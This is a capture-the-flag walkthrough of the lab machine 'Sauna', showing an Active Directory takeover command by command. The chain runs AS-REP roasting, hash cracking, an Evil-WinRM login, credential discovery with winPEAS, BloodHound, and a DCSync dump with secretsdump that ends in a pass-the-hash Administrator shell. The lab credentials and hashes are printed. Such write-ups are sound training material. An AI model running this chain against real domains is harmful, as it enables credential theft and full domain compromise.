Sauna

Explicit Privilege Escalation path via BloodHound and DSync

Summary

Appending the domain name EGOTISTICAL-BANK.LOCAL to /etc/hosts revealed usernames on the homepage.
Used username-anarchy to generate common permutations.
Performed an AS-REP Roasting attack using Impacket’s GetNPUsers.py, dumped a hash for fsmith.
Cracked the hash with john, logged in via WinRM using Evil-WinRM.
Found plaintext credentials for svc_loanmgr via winPEAS.exe.
Discovered via bloodhound-python that svc_loanmgr had DCSync rights.
Performed DCSync using secretsdump.py to dump Administrator NTLM hash.
Used Evil-WinRM to get full shell as Administrator.

sudo nmap -sV -p- 10.10.10.175 -oA saunaNmap -T 5

Website on port 80 revealed employee names like:

Jenny Joy, Johnson, Watson, Fergus Smith, Shaun Coins, Sophie Driver, ...

Generated username permutations:

./username-anarchy --input-file user.txt --select-format first.last,first,last,flast

Ran AS-REP Roasting:

impacket-GetNPUsers -dc-ip 10.10.10.175 -no-pass -usersfile usernames.txt EGOTISTICAL-BANK.LOCAL/

Cracked hash with john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.asrep

Verified with WinRM and gained shell:

evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'

Looked for interesting files:

Get-ChildItem -Path C:\Users\ -Include *.txt,*.log -File -Recurse -ErrorAction SilentlyContinue

Ran winPEAS.exe, found plaintext creds:

DefaultUserName: EGOTISTICALBANK\svc_loanmgr
DefaultPassword: Moneymakestheworldgoround!

Used bloodhound-python:

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All

Ran DCSync using secretsdump:

impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround!'@10.10.10.175 -just-dc-user Administrator

Got NTLM hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Verified and gained shell:

evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e

Last updated 8 months ago